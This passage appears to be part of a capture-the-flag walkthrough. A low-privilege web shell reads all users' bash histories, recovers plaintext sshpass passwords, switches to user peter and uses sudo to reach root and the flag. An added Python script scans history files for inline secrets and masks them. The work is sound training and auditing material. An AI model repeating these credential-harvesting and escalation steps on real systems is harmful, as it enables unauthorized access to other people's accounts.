./Drew/.bash_logout
./Drew/.profile
./JLipps
./JLipps/.bashrc
./JLipps/.bash_history
./JLipps/.bash_logout
./JLipps/.profile
./jamie
./jamie/.bashrc
./jamie/.bash_history
./jamie/.bash_logout
./jamie/.profile
./Taylor
./Taylor/.bashrc
./Taylor/.bash_history
./Taylor/.bash_logout
./Taylor/.profile
./peter
./peter/.zcompdump
./peter/.bashrc
find: './peter/.cache': Permission denied
./peter/.bash_logout
./peter/.sudo_as_admin_successful
./peter/.profile
./SHayslett
./SHayslett/.bashrc
./SHayslett/.bash_history
./SHayslett/.bash_logout
./SHayslett/.profile
./JKanode
./JKanode/.bashrc
./JKanode/.bash_history
./JKanode/.bash_logout
./JKanode/.profile
./AParnell
./AParnell/.bashrc
./AParnell/.bash_history
./AParnell/.bash_logout
./AParnell/.profile
./CJoo
./CJoo/.bashrc
./CJoo/.bash_history
./CJoo/.bash_logout
./CJoo/.profile
./Eeth
./Eeth/.bashrc
./Eeth/.bash_history
./Eeth/.bash_logout
./Eeth/.profile
./RNunemaker
./RNunemaker/.bashrc
./RNunemaker/.bash_history
./RNunemaker/.bash_logout
./RNunemaker/.profile
./SHAY
./SHAY/.bashrc
./SHAY/.bash_history
./SHAY/.bash_logout
./SHAY/.profile
./ETollefson
./ETollefson/.bashrc
./ETollefson/.bash_history
./ETollefson/.bash_logout
./ETollefson/.profile
./IChadwick
./IChadwick/.bashrc
./IChadwick/.bash_history
./IChadwick/.bash_logout
./IChadwick/.profile
./LSolum2
./LSolum2/.bashrc
./LSolum2/.bash_history
./LSolum2/.bash_logout
./LSolum2/.profile
./SStroud
./SStroud/.bashrc
./SStroud/.bash_history
./SStroud/.bash_logout
./SStroud/.profile
./LSolum
./LSolum/.bashrc
./LSolum/.bash_history
./LSolum/.bash_logout
./LSolum/.profile
./NATHAN
./NATHAN/.bashrc
./NATHAN/.bash_history
./NATHAN/.bash_logout
./NATHAN/.profile
./zoe
./zoe/.bashrc
./zoe/.bash_history
./zoe/.bash_logout
./zoe/.profile
# Print out all bash_history files
www-data@red:/home$ cat */.bash_history
cat */.bash_history
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
whoami
exit
exit
exit
exit
exit
exit
exit
exit
exit
id
exit
top
ps aux
exit
exit
exit
exit
cat: peter/.bash_history: Permission denied
top
exit
# Login as peter
$ su peter
red% id                                                                        
id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# Get root shell
red% sudo -i
sudo -i
➜  ~ id                                                                        
id
uid=0(root) gid=0(root) groups=0(root)
# Have a look at root dir
➜  ~ ls                                                                        
ls
fix-wordpress.sh  flag.txt  issue  python.sh  wordpress.sql
➜  cat flag.txt                                                                
cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)  
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
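The credentials above came out of world-readable .bash_history files: sshpass -p puts the password on the command line, so it lands in the history. As an added example, not part of the original writeup, here is a small audit script that scans the history files under /home for that kind of inline secret and reports the lines with the secret masked; the sample history is constructed from the commands seen above, and the pattern set (sshpass, mysql, PASSWORD-style variables) is an assumption to extend as needed.

```python
import re
from pathlib import Path

# Commands that accept a secret on the command line. Each pattern captures
# the secret itself so the report can mask it instead of repeating it.
# The "mysql -p" form only matches when the password is glued to the flag;
# "mysql -u root -p -h host" (prompted, as used in this writeup) is not a leak.
SECRET_PATTERNS = (
    ("sshpass", re.compile(r"\bsshpass\s+-p\s*(\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*?\s-p(\S+)")),
    ("mysql", re.compile(r"\bmysql\b.*?--password=(\S+)")),
    ("env-var", re.compile(r"\b\w*(?:PASSWORD|PASSWD|SECRET|TOKEN)\w*=(\S+)")),
)

HISTORY_FILES = (".bash_history", ".zsh_history", ".mysql_history")

# Constructed sample, modelled on the cat */.bash_history output above.
SAMPLE_HISTORY = """\
ls -lah
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
mysql -u root -p -h 10.10.10.10
mysql -u root -pplbkac wordpress
export WP_DB_PASSWORD=plbkac
top
"""


def scan_history_text(text, source="<constructed>"):
    """Return one finding per line that embeds a secret, with the secret masked."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for tool, pattern in SECRET_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({
                    "source": source,
                    "line": lineno,
                    "tool": tool,
                    "redacted": line.replace(m.group(1), "********"),
                })
                break  # one finding per line is enough
    return findings


def scan_home_dirs(home_root="/home"):
    """Walk home_root and scan every history file the current user can read.

    Unreadable files (peter's .bash_history in the writeup) are skipped, not
    fatal; a home directory being readable at all is itself the finding."""
    findings = []
    for home in sorted(Path(home_root).iterdir()):
        for name in HISTORY_FILES:
            try:
                text = (home / name).read_text(errors="replace")
            except (FileNotFoundError, PermissionError, NotADirectoryError):
                continue
            findings.extend(scan_history_text(text, str(home / name)))
    return findings


if __name__ == "__main__":
    for f in scan_history_text(SAMPLE_HISTORY):
        print("%s:%d [%s] %s" % (f["source"], f["line"], f["tool"], f["redacted"]))
```

Run scan_home_dirs() as root on the box itself to cover histories www-data could not read.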